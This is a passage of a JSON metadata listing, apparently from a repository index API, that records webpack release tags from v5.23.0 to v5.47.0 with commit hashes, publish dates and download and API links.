.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/